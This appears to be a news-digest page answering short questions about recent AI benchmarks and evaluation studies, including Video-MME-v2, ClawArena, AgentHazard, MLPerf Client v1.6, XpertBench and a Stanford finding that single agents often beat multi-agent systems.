AI Research & Impact

AGI Evals & Meta-Automation

AGI Evals & Meta-Automation

Key Questions

What is Video-MME-v2?

Video-MME-v2 advances benchmarks for comprehensive video understanding. It evaluates multimodal models on complex video tasks.

What is ClawArena?

ClawArena benchmarks AI agents in evolving information environments. It tests adaptability in dynamic, real-world-like settings.

Why do single agents outperform multi-agents per Stanford?

A Stanford study shows single agents often surpass multi-agent systems in efficiency. More agents do not always yield better results.

What is AgentHazard?

AgentHazard evaluates harmful behavior in computer-use agents. It identifies risks in autonomous AI interactions.

What is MLPerf v1.6?

MLPerf Client v1.6 includes performance optimizations and better user experience. It standardizes AI benchmarking across hardware.

What does Google say about AI benchmark raters?

A Google AAAI-26 study finds benchmarks use too few raters for reliability. It calls for more robust evaluation methods.

What is XpertBench?

XpertBench provides expert-level tasks with rubrics-based evaluation. It rigorously assesses advanced AI capabilities.

What are common pitfalls in AI benchmarks?

Navigating AI benchmarks reveals issues beyond numbers like inefficiency patterns and over-reliance on accuracy. True evaluation requires understanding context and limitations.

Video-MME-v2; Claw-Eval trustworthy; agent skills wild; tool reasoning inefficiencies; Paper Circle research agents; Stanford single > multi-agent; ClawArena; Google AAAI-26 rater; MLPerf v1.6; XpertBench; Agentic-MME; AgentHazard; TBSP; ARC-AGI-3 ~57%; AI Scientist; SkillX; benchmark pitfalls. Maturing evals amid agent risks.

Sources (18)
Updated Apr 8, 2026